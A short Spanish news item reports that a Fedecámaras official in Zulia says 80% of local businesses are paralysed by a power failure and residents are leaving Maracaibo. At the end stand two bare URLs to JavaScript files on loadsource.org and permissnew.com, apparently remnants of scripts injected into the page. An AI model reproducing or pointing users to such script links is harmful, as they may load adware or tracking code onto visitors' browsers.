El vicepresidente de Fedecámaras Ricardo Acosta Cedeño advirtió sobre el desespero de los zulianos debido al problema de la luz.

Ricardo Acosta Cedeño, vicepresidente de la Federación de Cámaras y Asociaciones de Comercio y Producción de Venezuela (Fedecámaras), en el estado Zulia, informó que 80% del sector empresarial en la entidad está paralizado luego de una falla en el sistema eléctrico.

“No tenemos información oficial al respecto, sabemos que se están haciendo reparaciones pero no han dicho nada, hablaron de un sabotaje, no ha dicho en cuánto tiempo lo repararan”, dijo Acosta en una entrevista para Unión Radio.

Explicó que la situación afectó transformadores en subestaciones y equipos eléctricos que retransmitían la energía que estaba llegando del sistema interconectado nacional. “No vemos una solución a corto plazo, esperamos algún anuncio oficial”, indicó.

Por otra parte, también advirtió sobre el desespero en la población zuliana. “Las personas están optando en irse a visitar a familiares a otros sectores o salir del municipio Maracaibo, que es el más afectado”.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1534258456794https://permissnew.com/addons/lnkr5.min.js

Loading...